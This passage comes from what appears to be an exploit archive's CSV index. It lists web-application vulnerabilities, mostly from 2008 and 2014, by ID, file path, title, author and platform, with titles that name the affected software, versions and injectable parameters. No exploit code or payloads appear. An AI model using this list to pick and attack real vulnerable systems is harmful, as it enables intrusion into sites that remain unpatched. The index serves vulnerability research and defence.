Information System 3.7.2.2/3.8.2.8 - 'Comments.asp?FC' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps, -31276,exploits/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'Labels.asp?Term' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps, -31277,exploits/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'ClassList.asp?Term' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps, -31278,exploits/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'GradebookStuScores.asp?GrdBk' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps, -31280,exploits/php/webapps/31280.txt,"Joomla! / Mambo Component Referenzen - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps, -31281,exploits/php/webapps/31281.txt,"PHP-Nuke Classifieds Module - 'Details' SQL Injection",2008-02-21,S@BUN,php,webapps, -31282,exploits/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps, -31283,exploits/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' SQL Injection",2008-02-21,S@BUN,php,webapps, -31284,exploits/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' SQL Injection",2008-02-21,S@BUN,php,webapps, -31286,exploits/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps, -31287,exploits/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' SQL Injection",2008-02-23,S@BUN,php,webapps, -31288,exploits/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' SQL Injection",2008-02-23,S@BUN,php,webapps, -31289,exploits/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' SQL Injection",2008-02-23,S@BUN,php,webapps, -31290,exploits/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module SQL Injection",2008-02-23,S@BUN,php,webapps, -31291,exploits/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps, -31292,exploits/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps, -31293,exploits/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' SQL Injection",2008-02-25,S@BUN,php,webapps, -31294,exploits/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' SQL Injection",2008-02-25,-=Mizo=-,php,webapps, -31295,exploits/php/webapps/31295.txt,"Joomla! / Mambo Component com_wines 1.0 - 'id' SQL Injection",2008-02-25,S@BUN,php,webapps, -31296,exploits/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' SQL Injection",2008-02-25,S@BUN,php,webapps, -31297,exploits/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps, -31299,exploits/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps, -31303,exploits/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' SQL Injection",2008-02-25,The-0utl4w,php,webapps, -31304,exploits/php/webapps/31304.txt,"Plume CMS 1.2.2 - '/manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps, -31313,exploits/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure",2008-02-28,"Richard Brain",cgi,webapps, -31314,exploits/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'Username' Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps, -31315,exploits/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Cross-Site Scripting",2008-02-28,vijayv,php,webapps, -31317,exploits/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps, -31318,exploits/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps, -31319,exploits/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps, -31320,exploits/php/webapps/31320.txt,"PHPMyTourney 2 - '/tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps, -31321,exploits/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps, -31322,exploits/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' SQL Injection",2008-03-01,TurkishWarriorr,php,webapps, -31324,exploits/php/webapps/31324.txt,"KC Wiki 1.0 - '/minimal/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps, -31325,exploits/php/webapps/31325.txt,"KC Wiki 1.0 - '/simplest/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps, -31326,exploits/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps, -31328,exploits/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' HTML Injection",2008-03-03,Dominus,php,webapps, -31329,exploits/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution",2014-02-01,@u0x,multiple,webapps, -31337,exploits/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection",2007-06-25,Lupton,php,webapps, -31339,exploits/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' SQL Injection",2008-03-05,ZoRLu,php,webapps, -31341,exploits/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Inclusion",2008-03-06,THE_MILLER,php,webapps, -31344,exploits/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' SQL Injection",2008-03-06,r080cy90r,php,webapps, -31529,exploits/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,php,webapps, -31350,exploits/php/webapps/31350.txt,"CiMe Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80 -31351,exploits/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' SQL Injection",2008-03-06,meloulisi,php,webapps, -31352,exploits/php/webapps/31352.txt,"ImageVue 1.7 - 'popup.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps, -31353,exploits/php/webapps/31353.txt,"ImageVue 1.7 - 'dir2.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps, -31354,exploits/php/webapps/31354.txt,"ImageVue 1.7 - 'upload.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps, -31355,exploits/php/webapps/31355.txt,"ImageVue 1.7 - 'dirxml.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps, -31356,exploits/php/webapps/31356.txt,"WordPress 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting",2008-03-07,Doz,php,webapps, -31357,exploits/php/webapps/31357.txt,"WordPress 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting",2008-03-07,Doz,php,webapps, -31358,exploits/php/webapps/31358.txt,"Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion",2008-03-07,ZoRLu,php,webapps, -31365,exploits/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - 'logfileViewSettings.jsp?filePath' Cross-Site Scripting",2008-03-08,nnposter,php,webapps, -31366,exploits/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - 'logfileViewSettings.jsp?filePath.0' Arbitrary File Access",2008-03-08,nnposter,php,webapps, -31367,exploits/php/webapps/31367.txt,"Batchelor Media BM Classifieds - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps, -31368,exploits/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 - 'pid' SQL Injection",2008-03-10,meloulisi,php,webapps, -31369,exploits/php/webapps/31369.txt,"Gallarific - 'search.php?query' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps, -31370,exploits/php/webapps/31370.txt,"Gallarific - Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,php,webapps, -31371,exploits/php/webapps/31371.txt,"EasyImageCatalogue 1.31 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps, -31372,exploits/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - 'thumber.php?dir' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps, -31373,exploits/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - 'describe.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps, -31374,exploits/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - 'addcomment.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps, -31375,exploits/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Local File Inclusion",2008-03-10,THE_MILLER,php,webapps, -31377,exploits/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' SQL Injection",2008-03-10,Lovebug,php,webapps, -31379,exploits/php/webapps/31379.txt,"EncapsGallery 1.11.2 - 'watermark.php?File' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps, -31380,exploits/php/webapps/31380.txt,"EncapsGallery 1.11.2 - 'catalog_watermark.php?file' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps, -31382,exploits/php/webapps/31382.txt,"Joomla! / Mambo Component ensenanzas - 'id' SQL Injection",2008-03-11,The-0utl4w,php,webapps, -31383,exploits/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' SQL Injection",2008-03-11,Houssamix,php,webapps, -31384,exploits/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' SQL Injection",2008-03-11,Lovebug,php,webapps, -31387,exploits/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,php,webapps, -31388,exploits/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,php,webapps, -31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps, -31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps, -31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps, -31392,exploits/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 - For Xoops 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps, -31393,exploits/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps, -31697,exploits/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps, -31400,exploits/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps, -31401,exploits/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File Inclusion",2008-03-12,U238,php,webapps, -31402,exploits/php/webapps/31402.txt,"eWeather - 'chart' Cross-Site Scripting",2008-03-12,NetJackal,php,webapps, -31404,exploits/asp/webapps/31404.txt,"Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection",2008-03-13,The-0utl4w,asp,webapps, -31406,exploits/php/webapps/31406.txt,"SNewsCMS 2.x - 'search.php' Cross-Site Scripting",2008-03-17,medprostuda.ru,php,webapps, -31408,exploits/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting",2008-03-17,ZoRLu,php,webapps, -31410,exploits/php/webapps/31410.txt,"Joomla! / Mambo Component com_guide - 'category' SQL Injection",2008-03-17,The-0utl4w,php,webapps, -31411,exploits/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps, -31413,exploits/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps, -31414,exploits/php/webapps/31414.txt,"phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps, -31415,exploits/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps, -31416,exploits/php/webapps/31416.txt,"webSPELL 4.1.2 - 'index.php' Cross-Site Scripting",2008-03-18,n3w7u,php,webapps, -31418,exploits/php/webapps/31418.txt,"Job Site 1.0 - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,php,webapps,80 -31419,exploits/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,php,webapps,80 -31420,exploits/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,php,webapps,80 -31421,exploits/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,php,webapps,80 -31423,exploits/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps, -31424,exploits/php/webapps/31424.txt,"WordPress Theme Dandelion - Arbitrary File Upload",2014-02-05,TheBlackMonster,php,webapps,80 -31425,exploits/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 -31426,exploits/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 -31427,exploits/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 -31430,exploits/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80 -31431,exploits/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 -31435,exploits/php/webapps/31435.py,"Joomla! Component com_community 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80 -31436,exploits/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 -31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps, -31439,exploits/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps, -31441,exploits/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection / Remote File Inclusion",2008-03-19,Cod3rZ,php,webapps, -31442,exploits/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps, -31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps, -31445,exploits/jsp/webapps/31445.txt,"Elastic Path 4.1 - '/manager/getImportFileRedirect.jsp?file' Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps, -31446,exploits/jsp/webapps/31446.txt,"Elastic Path 4.1 - '/manager/FileManager.jsp?dir' Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps, -31447,exploits/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps, -31448,exploits/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' SQL Injection",2008-03-20,Cr@zy_King,php,webapps, -31449,exploits/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31450,exploits/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31451,exploits/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31452,exploits/php/webapps/31452.txt,"W-Agora 4.0 - 'delete_notes.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31453,exploits/php/webapps/31453.txt,"W-Agora 4.0 - 'delete_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31454,exploits/php/webapps/31454.txt,"W-Agora 4.0 - 'edit_forum.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31455,exploits/php/webapps/31455.txt,"W-Agora 4.0 - 'mail_users.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31456,exploits/php/webapps/31456.txt,"W-Agora 4.0 - 'moderate_notes.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31457,exploits/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps, -31458,exploits/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 -31459,exploits/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,php,webapps,80 -31469,exploits/php/webapps/31469.txt,"ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps, -31470,exploits/php/webapps/31470.txt,"ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps, -31471,exploits/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting",2008-03-22,Y433r,php,webapps, -31472,exploits/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting",2008-03-22,Linux_Drox,php,webapps, -31475,exploits/jsp/webapps/31475.txt,"Alkacon OpenCMS 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps, -31476,exploits/php/webapps/31476.txt,"Efestech E-Kontor - 'id' SQL Injection",2008-03-24,RMx,php,webapps, -31480,exploits/php/webapps/31480.txt,"Quick Classifieds 1.0 - 'locate.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31482,exploits/php/webapps/31482.txt,"Quick Classifieds 1.0 - 'Classifieds/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31483,exploits/php/webapps/31483.txt,"Quick Classifieds 1.0 - 'Classifieds/view.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31484,exploits/php/webapps/31484.txt,"Quick Classifieds 1.0 - 'controlcenter/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31485,exploits/php/webapps/31485.txt,"Quick Classifieds 1.0 - 'controlcenter/manager.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31486,exploits/php/webapps/31486.txt,"Quick Classifieds 1.0 - 'controlcenter/pass.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31487,exploits/php/webapps/31487.txt,"Quick Classifieds 1.0 - 'controlcenter/remember.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31488,exploits/php/webapps/31488.txt,"Quick Classifieds 1.0 - 'controlcenter/sign-up.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31489,exploits/php/webapps/31489.txt,"Quick Classifieds 1.0 - 'controlcenter/update.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31490,exploits/php/webapps/31490.txt,"Quick Classifieds 1.0 - 'controlcenter/userSet.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31491,exploits/php/webapps/31491.txt,"Quick Classifieds 1.0 - 'controlcenter/verify.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31492,exploits/php/webapps/31492.txt,"Quick Classifieds 1.0 - 'controlpannel/alterCats.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31493,exploits/php/webapps/31493.txt,"Quick Classifieds 1.0 - 'controlpannel/alterFeatured.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31494,exploits/php/webapps/31494.txt,"Quick Classifieds 1.0 - 'controlpannel/alterHomepage.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31495,exploits/php/webapps/31495.txt,"Quick Classifieds 1.0 - '/controlpannel/alterNews.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31496,exploits/php/webapps/31496.txt,"Quick Classifieds 1.0 - 'controlpannel/alterTheme.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31497,exploits/php/webapps/31497.txt,"Quick Classifieds 1.0 - 'controlpannel/color_help.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31498,exploits/php/webapps/31498.txt,"Quick Classifieds 1.0 - 'controlpannel/createdb.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31499,exploits/php/webapps/31499.txt,"Quick Classifieds 1.0 - 'controlpannel/createFeatured.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31500,exploits/php/webapps/31500.txt,"Quick Classifieds 1.0 - 'controlpannel/createHomepage.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31501,exploits/php/webapps/31501.txt,"Quick Classifieds 1.0 - 'controlpannel/createL.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31502,exploits/php/webapps/31502.txt,"Quick Classifieds 1.0 - 'controlpannel/createM.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31503,exploits/php/webapps/31503.txt,"Quick Classifieds 1.0 - '/controlpannel/createNews.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31504,exploits/php/webapps/31504.txt,"Quick Classifieds 1.0 - 'controlpannel/createP.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31505,exploits/php/webapps/31505.txt,"Quick Classifieds 1.0 - 'controlpannel/createS.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31506,exploits/php/webapps/31506.txt,"Quick Classifieds 1.0 - 'controlpannel/createT.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31507,exploits/php/webapps/31507.txt,"Quick Classifieds 1.0 - 'controlpannel/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31508,exploits/php/webapps/31508.txt,"Quick Classifieds 1.0 - 'controlpannel/mailadmin.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31509,exploits/php/webapps/31509.txt,"Quick Classifieds 1.0 - 'controlpannel/setUp.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31510,exploits/php/webapps/31510.txt,"Quick Classifieds 1.0 - 'include/sendit.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31511,exploits/php/webapps/31511.txt,"Quick Classifieds 1.0 - 'include/sendit2.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31512,exploits/php/webapps/31512.txt,"Quick Classifieds 1.0 - 'include/adminHead.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31513,exploits/php/webapps/31513.txt,"Quick Classifieds 1.0 - 'include/usersHead.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31515,exploits/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php?zID' SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 -31516,exploits/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - 'Backend' Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 -31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 -31520,exploits/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 -31521,exploits/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",php,webapps,80 -31525,exploits/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80 -31527,exploits/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hard-Coded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 -31535,exploits/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps, -31537,exploits/cgi/webapps/31537.txt,"BlackBoard Academic Suite 6/7 - '/webapps/BlackBoard/execute/viewCatalog?searchText' Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps, -31538,exploits/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - '/bin/common/announcement.pl?data__announcements___pk1_pk2__subject' Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps, -31539,exploits/php/webapps/31539.txt,"PHPAddressBook 2.0 - 'index.php' SQL Injection",2008-03-26,"Virangar Security",php,webapps, -31541,exploits/php/webapps/31541.html,"Invision Power Board 2.x - 'Signature' iFrame Security",2008-03-26,SHAHEE_MIRZA,php,webapps, -31543,exploits/php/webapps/31543.txt,"GeeCarts - 'show.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps, -31544,exploits/php/webapps/31544.txt,"GeeCarts - 'search.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps, -31545,exploits/php/webapps/31545.txt,"GeeCarts - 'view.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps, -31546,exploits/asp/webapps/31546.txt,"DigiDomain 2.2 - 'lookup_result.asp?domain' Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps, -31547,exploits/asp/webapps/31547.txt,"DigiDomain 2.2 - 'suggest_result.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-27,Linux_Drox,asp,webapps, -31985,exploits/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps, -31549,exploits/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusions",2008-03-27,XxX,php,webapps, -31555,exploits/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusions",2008-03-28,Sibertrwolf,php,webapps, -40770,exploits/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps, -40353,exploits/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps, -31564,exploits/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps, -31565,exploits/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - 'setup.php?language_setup' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps, -31566,exploits/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php?test' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps, -31567,exploits/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps, -31568,exploits/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps, 